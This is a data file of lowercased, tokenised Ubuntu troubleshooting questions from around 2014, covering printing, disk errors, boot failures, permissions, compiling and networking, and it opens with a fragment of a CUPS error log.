localhost:631/printers/brother_mfc-8510dn ) from localhost e [ 18/mar/2014:19:39:40 -0400 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! w [ 18/mar/2014:19:39:59 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:39:59 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists e [ 18/mar/2014:19:43:54 -0400 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! e [ 18/mar/2014:19:48:13 -0400 ] [ job 1 ] stopping unresponsive job . w [ 18/mar/2014:19:48:27 -0400 ] addprofile failed : org.freedesktop.dbus.error.unknownmethod : no such interface `org.freedesktop.colormanager ' on object at path /org/freedesktop/colormanager/devices/cups_mfc8510dn w [ 18/mar/2014:19:49:15 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:19:49:15 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists w [ 18/mar/2014:19:49:15 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'mfc8510dn-gray.. ' already exists w [ 18/mar/2014:19:49:15 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-mfc8510dn ' already exists e [ 18/mar/2014:20:07:24 -0400 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! w [ 18/mar/2014:20:07:38 -0400 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother_mfc-8510dn-gray.. ' already exists w [ 18/mar/2014:20:07:38 -0400 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother_mfc-8510dn ' already exists e [ 18/mar/2014:20:11:33 -0400 ] returning ipp client-error-not-possible for cancel-job ( ipp : //localhost/jobs/6 ) from localhost e [ 18/mar/2014:20:12:20 -0400 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! e [ 18/mar/2014:20:16:54 -0400 ] [ cups-driverd ] bad driver information file `` /usr/share/cups/drv/cupsfilters.drv '' ! e [ 18/mar/2014:20:24:56 -0400 ] [ job 5 ] stopping unresponsive job .
436119	installing new internal hard drive with ubuntu . hard drive and logical name show up with sudo lshw -c disk , but receive an i/o error when using fdisk	i am trying to install ubuntu on a brand new internal hard drive using a usb install . using lshw -c disk i 'm able to see that my computer recognizes the hard drive is connected . ubuntu @ ubuntu : ~ $ sudo lshw -c disk *-disk description : ata disk product : st1000dm003 vendor : seagate physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : cc49 serial : s1dgbn30 size : 3950mib ( 4142mb ) configuration : ansiversion=5 but when i attempt to read the disk so i can partition and format it i get this ubuntu @ ubuntu : ~ $ sudo fdisk /dev/sda fdisk : unable to read /dev/sda : input/output error something similar happens when i try to do this through gparted ubuntu @ ubuntu : ~ $ sudo gparted input/output error during read on /dev/sda why is this happening ? if ubuntu can see that my hard drive is connected , why ca n't it do any of these basic operations . edit : running lsblk gives me this . the hard drive /dev/sda is 3.9gb ( supposed to be 1tb ) . i 'm pretty sure that 's because it has n't been initialized or partitioned yet . ubuntu @ ubuntu : ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 3.9g 0 disk sdb 8:16 1 3.7g 0 disk ââsdb1 8:17 1 3.7g 0 part /cdrom sr0 11:0 1 2k 0 rom loop0 7:0 0 666.6m 1 loop /rofs
436120	sort millions of text files in a folder using unix sort	i am trying to sort a lot of files ( millions ie approx 2.5m ) .txt files in a folder called nzparsed . all the files in the folder are named like 1.txt 2.txt and so on till 25xxxxx.txt after running the following command in eclipse : os.system ( `` sort -k1,1 -k3,3n -k4,4n -y 1048576 /home/viraj/nz/nzparsed/* -o /home/viraj/nz/splitindex/abcd.txt '' ) i get an error : sh : 1 : sort : argument list too long can anyone tell me any other way i could sort all these files into 1 file and split them using the following command in eclipse : os.system ( `` split -c 200m /home/viraj/nz/splitindex/abcd.txt /home/viraj/nz/splitindex/ '' )
436121	can i reinstall xubuntu 13.10 over the existing installation using the desktop dvd ?	installation seems to have run into problems at the very end . i can boot to either windows or xubuntu but am not sure the linux side is fully functional . thanks
436122	ca n't boot from usb	trying to boot into ubuntu from a usb stick . got all the files on the usb , and set bios to look at usb first . when i turn it on , the light flashes on my usb , so i know it 's accessing it . it brings up the first screen of ubuntu -- the screen shows the word ubuntu , the logo , and five dots under the word ubuntu , but then it hangs up there . does n't progress at all . ideas ?
436124	why does my umask keep resetting to 000 ?	when i login anew my umask is 002 . at least for a while . then at some point , and i 'm not sure when , it reverts to 000 . this is very inconvenient and i 'm now constantly living in fear of dropping files and folders with strange permissions across my home directory . the reversion to 000 can happen after minutes of use , or after days . a few weeks after i first installed ubuntu it happened quite a lot , then it cooled down , and just in the last few days this issue has reared its ugly head again . i can set it back to 002 with $ umask 002 but this only works for the current shell ( as expected ) . some more information : the tty at ctrl-alt-f2 has a umask of 002 even when my f7 login is at 000 /etc/profile says that umask is now handled by pam_umask /etc/login.defs has umask 022 and usergroups_enab yes i 'm running ubuntu 13.10 with xmonad and ( oh-my- ) zsh . in case this is useful , here 's my /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sdb8 during installation uuid=96f989e0-ee94-4bff-9663-3fa479a83ad4 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sdb1 during installation uuid=7682-b8ad /boot/efi vfat defaults 0 1 # swap was on /dev/sdb7 during installation uuid=0d7d57af-9a31-481e-9da4-1032c94f57e9 none swap sw 0 0 here is an abridged version of my crontab from crontab -l * * * * * cd /home/miles/code/checkin/ & & ./node_modules/.bin/coffee ./client.coffee -n attercop -h secret1.com -p 8888 * * * * * cd /home/miles/code/checkin/ & & ./node_modules/.bin/coffee ./client.coffee -n attercop -h secret2.com -p 8888 client.coffee is just a script that sends an http request . and my root crontab from sudo crontab -l reports no crontab for root
436125	how can i link my aim account with empathy ?	i 'm trying to connect my aim account with the empathy chat , i already entered my user and password , but it does n't work , i do n't know if i am doing anything wrong ( tried to log in with these formats : user @ aol.com , and just using my user , and i 'm pretty sure that my password and user are correct ) . every time i launch empathy it shows a message `` aim account needs authorisation '' , how can i fix that ?
436126	how can i reset terminology settings if the terminal is inaccesable ?	iâm on ubuntu 12.04 running gtk 2.x+ i was experimenting with new terminals and messed up terminology , i tried to do sudo apt-get autoremove terminology thinking that would remove the program and settings , then reinstalled it sudo apt-get install terminology but when i run the program i get the same issues and this output if run via another console . renamon @ gibson { ~ } : terminology err < 13620 > : elementary elm_prefs.c:2139 _elm_prefs_init ( ) prefs iface module could not be loaded , the prefs widget wo n't function err < 13620 > : efreet_cache lib/efreet/efreet_cache.c:1108 on_send_register ( ) org.freedesktop.dbus.error.serviceunknown the name org.enlightenment.efreet was not provided by any .service files renamon @ gibson { ~ } : any help on this issue ? how do i reset terminology prefrences ? can this application even be used in ubuntu ?
436132	avconv - filter drawtext does n't work	i ' going to add some text to a video segment using -vf but it does n't work . here is what i tried avconv -ss 00:00:20 -i input.mp4 -t 00:00:10 -vcodec copy -acodec copy \ -vf `` drawtext=fontfile='/usr/share/fonts/truetype/ttf-dejavu/dejavusans.ttf ' : text='hello world ' : x=0 : y=0 : fontsize=24 : fontcolor=black '' output.mp4 but the text does n't show up . i know that -t argument should appear after -i or the duration wo n't be set . i wonder if i misplace -vf in this case . would anyone tell me how to make it ? p.s . i install it with apt-get install ffmpeg . software info : avconv version 0.8.9-6:0.8.9-0ubuntu0.13.04.1 , copyright ( c ) 2000-2013 the libav developers built on nov 9 2013 19:09:48 with gcc 4.7.3
436133	unable to resume after suspend	i 'm using ubuntu 12.04 & everything about it is great except that it just wo n't resume after suspend . i 've tried the suggestions listed in this thread entire system freezing after pressing `` suspend '' but none worked . i 'm using lenovo y510p . i 'm new to ubuntu , or unix for that matter , so please let me know if there 's anymore information that i should be posting . thanks . update i tried the suggestion by dima on this post how to enable hibernation ? . the machine wakes up from hibernation but immediately the screen gives a screen like this wondering if this is an issue with the graphics card or something .
436140	ubuntu boot problem . grub rescue	i use hp pavillion dv6 . i installed ubuntu 13.10 after using gparted in try version to remove all the partitions from my previous dual boot ( windows 7 and ubuntu 12.10 ) . i had to install the new ubuntu because i 've been troubled by the messages like unkown file system , attempt to read or write outside 'hd0 ' , read error when i boot along with the grub rescue . so now i erased all the data after backup and reinstalled the ubuntu 13.10 to get rid of the above problems . but the problem still persists . please urgent help needed.after performing boot repair i got a message including the url http : //paste.ubuntu.com/7115746/ .
436141	is it better to install software through software center or compile it myself ?	this is kind of a general question about installing stuff and remove as well . i 've never compiled any software from source but i 'm wondering , is it better ? what are the pros and cons of each ways of installing software . by the way , i 'm currently using ubuntu 13.04 .
436143	unable to access auto-mounted partition from steam	before i start , i am using ubuntu 13.10 64-bit , i have all the latest updates ( including the latest steam beta client ) . using the steam client i have been unable to install or run games from another partition on my drive . previously , the partition with the games would mount into the /media/willc folder ( and steam could read/write here , i installed and ran left 4 dead 2 ) but i would have to mount it by opening it in the file system or via the terminal before hand ; i wanted to automate this process . i followed the directions from akshit baunthiyal on this question to make ubuntu mount the partition seperately . it essentially just adds a line to /etc/fstab . the line i added was uuid= < uuid > /home/willc/steamlibrary ext2 user , exec , sync , auto , rw 0 0 and i double checked the info , the uuid and filesystem are correct and the mount point is where i want it . after this modification , logging in or running sudo mount -a successfully mounts the directory automatically . the problem i am now encountering is that the steam client gives me the error new steam library folder must be on a filesystem mounted with executable permissions . so , after looking around at fstab options i noticed that the option `` user '' ( any user can mount ) also implies the option `` noexec '' ( binaries are not executable ) , so i added the `` exec '' option after user to override this . however , i still get this error . i also tried to run chmod -r 777 steamlibrary just in case permissions were the problem but it persists even after that . is there a missing option i need for fstab or is there something else entirely i might be missing ?
436147	configuring canon irc3380i printer job accounting	i have managed to install the networked attached printer ( canon ir c3380i ) on ubuntu 13.10 64bit . i can see the printer properties ( such as ink level , paper feeder setting , ... ) . but the problem is i can not print . the printer is set to accepts prints only if the user has an id and password . previously on windows 7 after clicking on print a popup would show up ( below is a screen shot of the popup screen ) and ask for the id and password ( this was not my windows id ) . but now on ubuntu 13.10 the screen does n't show . below is the following commands output . sudo gedit /etc/cups/printers.conf output : # printer configuration file for cups v1.7rc1 # written by cupsd # do not edit this file when cupsd is running < defaultprinter irc3380i > uuid urn : uuid:39bed17a-75f8-329f-7533-b59b66b18213 info canon ir c3380 61.01 location office makemodel canon ir c2880/c3380 pxl deviceuri socket : //10.0.0.55 state idle statetime 1395196420 type 12595228 accepting yes shared yes jobsheets none none quotaperiod 0 pagelimit 0 klimit 0 oppolicy authenticated errorpolicy retry-job option media 6 option media-col media-bottom-margin option output-bin 0 option print-color-mode color option print-quality 5 option sides two-sided-long-edge attribute marker-colors \ # 000000 , # 00ffff , # ff00ff , # ffff00 , none attribute marker-levels 100,100,100,100 , -1 attribute marker-names c-exv 21 , c-exv 21 , c-exv 21 , c-exv 21 , waste toner attribute marker-types toner , toner , toner , toner , waste-toner attribute marker-change-time 1395196420 < /printer > p.s . i downloaded the printer driver from : http : //software.canon-europe.com/products/0010366.asp
436148	play on linux not showing league of legends	i am using the following : ubuntu 12.04 playonlinux 4.0.14 ( henceforth referred to as `pol ) installed pol today , trying to get league of legends running . everything seems to install smoothly , but when i go to the install button in the gui ( as in running pol ) , league is n't listed . not in testing or games , or in search . i 've hit refresh , rebooted . should i attempt to re-install pol ? manually add league ? anything would be helpful .
436149	ubuntu 12.04 , dell xps 15z not able to create wifi access point for android	i have dell xps 15z laptop with intel corporation centrino advanced-n 6230 network controller . i have tried creating a wifi hotspot in windows using connectify . it worked fine . but i am not able to create wifi access point in ubuntu . when i create it using common method like going to network manage and click use as a hotspot my android phone does n't even detect it . i have also tried creating a network using hostapd but it gives be following error : nl80211 : failed to set interface wlan0 into ap mode nl80211 driver initialization failed . i would really appreciate some help here to how to create wifi access point in this case ? thanks
436150	how to set up an openam saml sso authentication providing service hosted by tomcat on ubuntu with an sso applied salesforce account ?	i would like to know how to set up an openam saml sso authentication providing service hosted by tomcat on ubuntu with an sso applied salesforce account .
436151	limit download speed if filesize 20mb	is there a software like trickle lets say for example ? that i can put as a proxy and lets say set it up so that if a filesize that i am downloading is over 20mb it will limit it to 2kb ? i found trickle but it doesnt seem to be that configurable .
436153	update manager , manual update , alternatives , or make my own package ?	i was wondering if i can manually update the repos in the update manager to have teamspeak3 ( currently it only has teamspeak 2 and many other outdated software 's ) if not , are there any other alternatives to the update manager ? teamspeak 3 does not have a package so how would i go about making one myself to install on my ubuntu box instead of launching/installing and running out of a file ?
436155	remove previously flashed vbios splash screen	i am new to linux and have recently installed and have ubuntu 13.10 working . something weird is going on though . back when i first got my aw17 i was all into benchmarking and i flashed my vbios and that caused me to have this splash screen at startup even before the bios . well i had to completely repartition and restore my hard drive and now this is happening , it must have been saved in the restore somehow . i figured it would be erased after the new os . anyone mind helping me read through my boot log to find this and remove it please ! i will post any results to instructions asap .
436158	realvnc over haguichi/hamachi . ubuntu 12.04 client , windows 7 server	afternoon all i have 2 vm boxes running on my windows box at home that i am able to successfully ssh into over hamachi/haguichi , how ever with realvnc hosted on my windows box and using the linux realvnc viewer client on ubuntu 12.04 desktop edition from my laptop , i am unable to connect . i am definitely using the correct ip address either through hamachi or connected to my lan/wifi locally.. and i get a `` the connection closed unexpectedly '' error . as far as i can tell i have the server set up correctly on my windows box ... i 've used realvnc on and off for years , just never from a linux client . any suggestions would be great please andrew
436159	edit the usb mass storage driver	i want to edit the usb msd , to show a message whenever i plug a device ( like a flash drive ) to my computer . how do i do it ? which file exactly is to be edited and how ?
436162	compiling and linking of a c program	i am learning about compiler linker and loader and was trying to understand the working of linker and loader on my ubuntu 12.04 machine i wrote 2 simple `` .c '' files as follows test.c # include < stdio.h > int main ( int argc , char **argv ) { printf ( `` % d '' , test_fun ( 10 ) ) ; } test2.c # include < stdio.h > int test_fun ( int a ) { return a*10 ; } then i executed following commands cc -c test.c cc -c test2.c ld test.o test2.o -o a.out -lc -- entry main now in my current directory a.out file is generated . i can see the file when i type ls but when i try to run the file as ./a.out i get error bash : ./a.out : no such file or directory what am i doing wrong ? please help me ?
436167	screen frozen when ubuntu restore from suspend in laptop	i 'm new to ubuntu , and my problem is that whenever i close the lid of my laptop and open it again , the login screen does n't appear . instead i 'm stuck at a black screen with a frozen mouse cursor ( both my keyboard and my mouse are frozen also , and i 'm unable to do anything apart from holding the power button and restart the laptop all over again . i 'm currently running ubuntu 12.04 on a dell inspiron 15r 7537 , dual boot with windows 7 ultimate x64 via wubi . specs : intel corei5 4200u , 4gb ram , radeon hd 7670m , 500gb hdd .
436171	why the apt prompts me to enter the full phrase while purging a package ?	do n't try this command . while i 'm trying to purge the package login , terminal asks me to enter the whole text rather than [ y/n ] . avinash @ avinash-virtualbox : ~ $ sudo apt-get purge login reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : login* warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! login 0 upgraded , 0 newly installed , 1 to remove and 303 not upgraded . after this operation , 1,212 kb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' ? ] why it prompts me to enter the whole yes , do as i say ! text ? what will happen if i enter y or yes ?
436173	is it safe to remove a process folder from /var/run/ ?	is it safe to remove a process folder from /var/run/ if i think it has got wrong permissions , will it be recreated by process as before ? do i lose any information by deleting /var/run/ < process folder > when the process is not running ? after deleting if it works/runs , does that mean it has not lost any data ?
436175	can i use the de as in 13.04 on 12.04	i want to use 13.04 desktop environment ( de ) in 12.04 is it possible without upgrade.i am using 32 bit ubuntu . please tell me if this is possible or not . thanks in advance . : )
436178	make mistake in setting ip	i have a device that has linux ubuntu os . i use ssh for connecting to it . my linux version is like below when typed cat /proc/version command : linux version 3.2.40-g996c4d7-dirty ( sysmocom @ vagrant-ubuntu-precise ) ( gcc version 4.6.3 20111117 ( prerelease ) ( gcc ) ) # 1 preempt mon oct 7 8:28:29 cest 2013 . i change the ip setting with vi command ( vi /etc/network/interfaces ) , but i made a mistake in writing the word `` address '' . i typed it `` adress '' . now i do n't see the device in the network and i do n't know what is it 's ip . how i can connect to it again ?
436180	uninstall windows server 2008 and add disk space to ubuntu 12.04	i have windows 2008 and ubuntu 12.04 installed . i want to remove windows server 2008 and add space to ubuntu 10.04 ? how can i do this ?
436181	resizing media partition , safe ?	i recently switched to ubuntu 12.04 . i have two storage drives , my ssd with ubuntu and the root filesystem installed on it , and my 1tb hdd with movies and other large data files . i wiped the ssd on the installation , but i kept the media drive as is ( for the installation ) . i decided i wanted to use ext4 format instead ( mostly because plex has issues with ntfs and the permissions not being there ) . because the amount of data took up ~200gb of space , i do n't have another drive to move it onto temporarily , so i created a 700gb partition on the unused portion of my hdd , formatted to ext4 , moved my data over ( fixed the permissions ) , and currently deciding on how to continue . i can directly resize the current ext4 partition to fill the hdd , but because the data is sitting in the middle it wants to move it to the start of the partition . so i get a warning . how dangerous is it to go this route ? i ca n't back up the hdd . my other option is to format the old ntfs to ext4 , move the files back to that partition , delete the second ext4 partition and resize the one i just formatted to fill the hdd . i 'm not % 100 certain that my files would be safer as they would n't need to be moved but it would seem like it . am i correct ? tl ; dr : have a 1tb hdd with two partitions , an empty one ( no format ) take up the first ~300gb of the drive , and one with my data files ( ~200gb ) in ext4 that fills the rest of the hdd . the data starts at the begining of the second partition so resizing the second to fill the hdd would require moving the files while being formatted ( i assume ) . is this safe ? if not i 'll just go the second route , more time consuming is all ( took nearly an hour for my files to be moved last time ) .
436187	update qjson on ubuntu 12.04 ?	i currently have libqjson-dev 0.7.1-6 installed on 12.04 via package manager . i need 0.8.0 in order to run an app i like . i have little experience compiling from source , less with cmake . i assume there 's no backport . can someone please help me install 0.8.1 from sourceforge ? i know that ubuntu 13.10 comes with a higher version of qjson . i 'm hoping that they 'll be no issues with qjson 0.8 on ubuntu 12.04 . thanks !
436196	namenode , jobtracker and secondarynode are not getting displayed	i am using ubuntu 12.04 after starting up the single node cluster , i check whether the hadoop is running hduser @ amena-inspiron-3537 : /usr/local/hadoop $ jps 6766 jps hduser @ amena-inspiron-3537 : /usr/local/hadoop $ : namenode jobtracker and secondarynode are not getting displayed . please help me .
436197	ndiswrapper not working	0bda:0179 realtek is the product of the lsusb command . i have installed its windows wireless drivers in ubuntu with ndiswrapper as the linux ones are useless . the driver installed properly and the hardware is detected but i can not access the internet as the dongle is not seen in the ubuntu internet manager . what do i do now ?
436198	no sound from speakers	just installed a new kubuntu 13.10 . it seems the intel hda sound card are recognized as a hdmi ( digital ) output rather than both an analog output and a digital one . alsainfo is here any ideas how to fix this ?
436203	how do i get the pcap lib on ubuntu ?	i have a programming assignment where i need to use the pcap lib . # define _bsd_source # include < stdio.h > # include < stdlib.h > # include < string.h > # include < pcap.h > // < -- missing include # include < netinet/ip.h > # include < netinet/tcp.h > void logpacket ( unsigned char* payload , struct ip* ipheader , struct tcphdr* tcpheader ) { // ... } int main ( int argc , char* argv [ ] ) { // ... } how can i get the library files i need to compile this program ?
436206	i need to update my opengl drivers to play counter strike source ubuntu 13.10	i get an error glgeterror when i launch counter strike source . normal counter strike runs fine , this is all through steam . i 've done some digging and i need to get newer opengl drivers , my laptop has gpu 945gm intel and 1.4 opengl from what i can see . here are the sites ubuntu forum and launchpad i 'm stuck at the /etc/x11/xorg.conf . ubuntu 13.10 doesnt have this ? also from the graphics driver guide i 'm not sure which of these i should be using to force the use of gallium i915 driver : $ libgl_drivers_path=/usr/lib/dri-alternates glxgears -info to force the use of gallium llvmpipe software render : $ libgl_always_software=1 glxgears -info to force the use of old non-gallium software render : $ libgl_always_software=1 libgl_drivers_path=/usr/lib/dri-alternates glxgears -info any help would be great
436207	not able to change permission of files/folder shared in samba	i am trying to change permission and change the group permission of the folders which are shared through samba ( samba pdc ) . commands are as follows : # chmod 766 /mnt/format but nothing changed . please help .
436211	enable @ with alt+64	i wanted to know if there is a way to enable @ by pressing alt+64 like in windows . i use both spanish and english keyboard so i find it useful .
436212	no wifi , ethernet , audio ( sound ) after installation of chrubuntu ( 12.04 ) on acer c7	i have installed chrubuntu on acer c7 , but by the end of the process a can not have sound , internet ( ethernet or wireless ) and probably the graphic driver not recognised though with chrome everything works perfectly . please , if there any one who can assist me to fix this issue i will be so grateful to him/her . best regards .
436214	can not print from epson sx105	please advise how i will be able to print - i have an epson sx105 installed , but can not print anything .
436215	unity application lens removed , no local apps now	i was removing all of the unity web result lenses , and somehow i 've now got no local app results . this is what i did to remove them : sudo apt-get purge unity-lens-music sudo apt-get purge unity-lens-applications sudo apt-get purge unity-lens-shopping what should i do to get back my local apps without recommendations ?
436216	how to solve high contrast problem ?	i set high contrast on login screen in ubuntu 14.04 , after i restart system on login , the screen displays only black screen , so i 'm unable to login . could you please help me to turn off high contrast mode .
436221	problem installing qtoctave	first i installed matlab and i got stuck here : no matlab executables were found in the directories you specified . this package requires at least one local installation of matlab . i was unable to know what actually are the matlab executables . secondly i installed qtoctave as an alternative to matlab , but again the same error mentioned above appeared . i also tried some answers from this site , but i was unable to install it .
436227	how to share files between windows 8 and ubuntu in the lan ?	i have windows 8 pc and ubuntu 13.10 notebook . they are connected to d-link dir-100 router : ip : 192.168.0.100 pc directly through cable ip : 192.168.0.103 notebook through wi-fi access point ( edimax ) notebook has samba and cifs-utils installed . pc can not browse shared folders on notebook . notebook does n't see windows shares . both can access internet .
436228	infinality font patches ignore environment variables	i installed infinality patches for freetype font renderer on my ubuntu 13.10 system . i wanted to emulate windows fonts . i tried a few pre-defined themes ( win7 and osx2 ) in infctl.sh . it really changed my font rendering , but theme itself was not the thing i needed . osx2 theme was the most similar to windows , but i wanted to make letters darker . for the fine tuning of font rendering , i changed the settings in /etc/profile.d/infinality-settings.sh . i changed the filtering parameters , restarted my system - and nothing happened . the environment variables are exported correctly , but infinality does not see them . how can this be fixed ? p.s . my dark font settings and printenv are here .
436229	items have disappeared from the panel , and apps do not work with image files	items have disappeared from the panel , and apps do not work with image files , for example gthumb . gimp appears , but gives this message : not support file jpg . this happened yesterday ( march 18 , 2014 ) following an update . help is urgently needed .
436230	how to get login page of bugzilla on localhost after installation	i have install the bugzilla 4.0 and typed http : // < local domain name > /bugzilla/ i got the following on the web page . i did not get any login page . index of /bugzilla name last modified size description -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- parent directory - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- apache/2.2.22 ( ubuntu ) server at localhost port 80 is it a successful installation or what need to do ?
436232	can not fine syscall_32.h , header missing	when i run 'make ' , i get an error saying : make [ 1 ] : *** no rule to make target `/usr/src/linux-headers-3.8.0-29-generic/arch/x86/syscalls/syscall_32.tbl ' , needed by `arch/x86/syscalls/../include/generated/uapi/asm/unistd_32.h ' . stop . make : *** [ archheaders ] error 2
436234	error while booting lubuntu 13.10 via virtualbox	i 'm running windows 7 with oracle virtual box . i stuck at the folloowing error :
436237	what partitions belongs where ?	i am using windows 7 , and i have been using linux mandriva . i am now switching to ubuntu , and i forgot to format all the partitions from mandriva ( ext4 partitions ) before installing ubuntu . so right now i am wasting space on mandriva linux , which i wo n't be using any more . i would like to remove the mandriva partitions and use them in either ubuntu or windows . but how do i determine what ext4 partitions are used by ubuntu , and which i can delete ( used by mandriva ) ? i have been in the browser system and looked at the partitions , and i know for sure that the explorer in ubuntu says that the mandriva partition is 30 gb ( checked folders and files to be sure that it 's the mandriva ) . according to gparted i have a 24.34 gb , 12.01 gb and a 27.67 gb ext4 partition . i think ( not sure in any way ! ) that the mandriva is the 27.67 partition , since it 's the closest to 30 , and the linux i gave the most gb originally . i hope you can help me , i have been scouting the internet , but seems i am the only fool making this mistake . if everything else fails , i can back up the files in ubuntu , and delete all the linux partitions , but it would be nice if there 's a smarter way
436240	how to install eclipse which i have already downloaded with android development kit ?	i have downloaded the full android development kit ( adk ) from the official google developers website . it is a .zip file which contains eclipse and other adt tools . i want to install the eclipse application which is in that .zip file . i do n't want the trouble of going every time to that particular directory and running eclipse from there . is there any command which lets me install the version of eclipse which i have downloaded with adk ? export path= $ path : /home/amol/downloads/adt-bundle-linux-x86_64-20131030/sdk/tools export path= $ path : /home/amol/downloads/adt-bundle-linux-x86_64-20131030/sdk/platform-tools export path= $ path : /home/amol/downloads/adt-bundle-linux-x86_64-20131030/eclips # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything case $ - in *i* ) ; ; * ) return ; ; esac # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ { debian_chroot : - } '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if ! shopt -oq posix ; then if [ -f /usr/share/bash-completion/bash_completion ] ; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ] ; then . /etc/bash_completion fi fi
436245	how to properly uninstall konakart from ubuntu ?	i was following these instructions but some of the steps were described in a later stage . i installed konakart by running sudo ./konakart-7.2.0.0-linux-install-64 but instead i should have ran sudo ./konakart-7.2.0.0-linux-install-64 -s \ -ddatabasetype mysql \ -ddatabaseurl jdbc : mysql : //localhost:3306/konakart ? zerodatetimebehavior=converttonull \ -ddatabaseusername konakart \ -ddatabasepassword konakart \ -ddatabasedriver com.mysql.jdbc.driver \ -dinstallationdir ~/konakart \ -dloaddb 1 \ -djavajre /usr/local/java/jdk1.7.0_51 \ -dportnumber 8780 \ -dhttpsportnumber 8783 if i delete the files installed in ~/konakart and try to execute the 'appropriate ' ( last ) command , than i get a setlocalconfigresult-mysql.log where i have the following database connection test failed - ( dbname = store1 ) this tells me that some properties from the 'default ' command are still set even if i ran the other install ( second/last command ) . so how can i uninstall konakart appropriately ? btw , i am doing all this from putty ( remote machine ) . also , if someone can 'konakart ' tag this post , it would be nice .
436247	uris for linux-image-3.11.0-15-generic	i 'm using ubuntu desktop ( linux version 3.11.0-15-generic ( buildd @ allspice ) ) . i tried to get linux source code by command : sudo apt-get source linux-image-3.11.0-15-generic then i saw this error : home @ ubuntu : ~ $ sudo apt-get source linux-image-3.11.0-15-generic reading package lists ... done building dependency tree reading state information ... done e : you must put some 'source ' uris in your sources.list i ca n't find the suitable uri link to add in /etc/apt/sources.list .
436250	how can i download social engineering tool for 13.10	i used to use backtrack 5r3 before switching to ubuntu . i want to use the social engineering tool but could n't find one . is the mentioned tool same as for ubuntu 11.10 or 12.10 .
